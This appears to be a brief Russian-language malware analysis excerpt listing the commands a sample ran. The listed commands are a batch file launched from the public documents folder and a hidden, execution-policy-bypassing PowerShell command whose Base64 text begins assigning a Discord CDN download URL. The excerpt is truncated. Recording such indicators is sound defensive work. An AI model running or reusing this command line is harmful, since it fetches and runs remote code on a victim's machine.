Техническая информация
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\Documents\zexo.bat" "
- C:\users\public\documents\zexo.bat
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executIonPOLIcY ByPaSs -nOProfILe -WIndoWSTYLe HiDdeN -E JABTAFoAWABEAEMARgBWAEcAQgBIAE4ASgBTAEQARgBHAEgAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQ...